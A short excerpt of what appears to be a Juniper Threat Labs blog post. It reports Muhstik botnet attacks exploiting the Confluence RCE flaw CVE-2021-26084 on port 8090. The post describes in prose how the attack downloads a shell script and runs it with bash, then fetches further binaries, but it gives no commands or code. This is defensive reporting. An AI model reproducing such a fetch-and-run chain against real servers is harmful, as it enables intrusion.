Muhstik Botnet targeting Confluence servers with CVE-2021-26084

Share on facebook
Share on twitter
Share on linkedin
Share on reddit
Share on email

Official Juniper Networks Blogs
Muhstik Botnet targeting Confluence servers with CVE-2021-26084


Juniper Threat Labs is seeing an on-going attack targeting Confluence servers. On August 25, Atlassian, the company behind Confluence, disclosed the vulnerability CVE-2021-26084. A few days after that, several proofs-of-concept to exploit this vulnerability surfaced online, which included an unauthenticated remote code execution (RCE). Along with that, we started seeing an active exploitation of this vulnerability in our telemetry which started on September 02. 

Most of the attacks are on port 8090, which is the default port for Confluence. 

CVE-2021-26084 attacks

A dominant attack we have seen is an attack by the Muhstik botnet.  

CVE-2021-26084 attack from Muhstik bot

The attack will download a file shell script, conf2 from and will execute it with bash. The script will download the additional binaries dk86 and dk32 from and

Read the article